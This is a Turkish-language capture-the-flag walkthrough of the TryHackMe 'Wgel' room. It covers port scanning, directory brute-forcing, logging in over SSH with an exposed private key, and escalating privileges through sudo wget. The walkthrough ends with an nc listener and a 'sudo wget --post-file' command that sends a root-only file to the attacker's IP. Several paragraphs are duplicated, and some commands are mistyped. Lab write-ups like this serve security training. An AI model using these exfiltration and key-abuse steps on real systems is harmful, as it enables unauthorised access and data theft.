Herkese merhaba. Bugün TryHackMe'de bulunan wgel ctf makinesini çözeceğiz.
Zorluk seviyesi: kolay
İlk olarak verilen IP adresine bir ağ taraması ile başlıyoruz. Ağ taraması için nmap aracını kuulanıyoruz. Nmap aracı sayes,nde hangi portların açık olduğunu öğrenebileceğiz.
Nmap taramamız sonucunda 22 ve 80 numaralı portlarının açık olduğunu öğrendik. Port 80 http için kullanılır. 22 numaralı port ise ssh bağlantılarında kullanılır. 22. porrttan ssh'ye, 80 numaralı porttan webe bağlanantı sağlayabiliriz. Tarayıcımıza geçiyoruz ve IP adresinin bulunduğu siteyi açıyoruz.
Sayfamızın kaynak kodlarına baktığımızda Jessie'ye ait bir not buluyoruz.
Ve terminal ekranımıza geri dönüp gobuster aracını (web sitesinde bulunan bruteforce uzantılarını çalıştırmak için) kullanıyoruz.
Zorluk seviyesi: kolay
İlk olarak verilen IP adresine bir ağ taraması ile başlıyoruz. Ağ taraması için nmap aracını kuulanıyoruz. Nmap aracı sayes,nde hangi portların açık olduğunu öğrenebileceğiz.
Nmap taramamız sonucunda 22 ve 80 numaralı portlarının açık olduğunu öğrendik. Port 80 http için kullanılır. 22 numaralı port ise ssh bağlantılarında kullanılır. 22. porrttan ssh'ye, 80 numaralı porttan webe bağlanantı sağlayabiliriz. Tarayıcımıza geçiyoruz ve IP adresinin bulunduğu siteyi açıyoruz.
Sayfamızın kaynak kodlarına baktığımızda Jessie'ye ait bir not buluyoruz.
Ve terminal ekranımıza geri dönüp gobuster aracını (web sitesinde bulunan bruteforce uzantılarını çalıştırmak için) kullanıyoruz.
Kod:
Gobuster dir -u "Site Linki" -w "wordlistin bulunduğu konum"
Tarama sonucunda sitemap'ini bulduk.
Tarayıcımıza tekrar dönüp kontrol edelim.
İd_rss adlı bir dosya bulduk ve açtığımızda rsa key bizi karşılıyor.
Rsa dosyasını makinemize kaydediyor ve terminal ekranımıza geri dönüyoruz. Artık elimizde bir rsa dosyası, ssh bağlantımız ve jessie isimli nickimiz bulunuyor. Rsa dosyasına erişmek için gerekli izinleri vermemiz gerekiyor. Bunun için:
Kod:
chmod 600 id_rsa
Ve bağlanmak içinse:
Kod:
Ssh -i id_rsa jessie@"IP adresi"
Bağlantımız kuruldu. "ls" komutu ile dosyaları listeledikten sonra "cd" komutu ile dökümanlar klasörünün içine giriş sağkıyoruz. Ve user_flag.txt dosyamızı buluyoruz.
Şimdi Jessie'nin root kullanbilriliğini kontrol ediyoruz. Bunun için:
Kod:
Sudo -l
komutunu kullanıyoruz. wget var. Bir root flag kullanabiliriz.
Bir dinleyici oluşturuyoruz.
Kod:
nc -lvnp4445
Şimdi dosyayımızı gönderiyoruz
Kod:
sudo wget --post-file=root/root_flag.txt"IP adresi"
Ve son!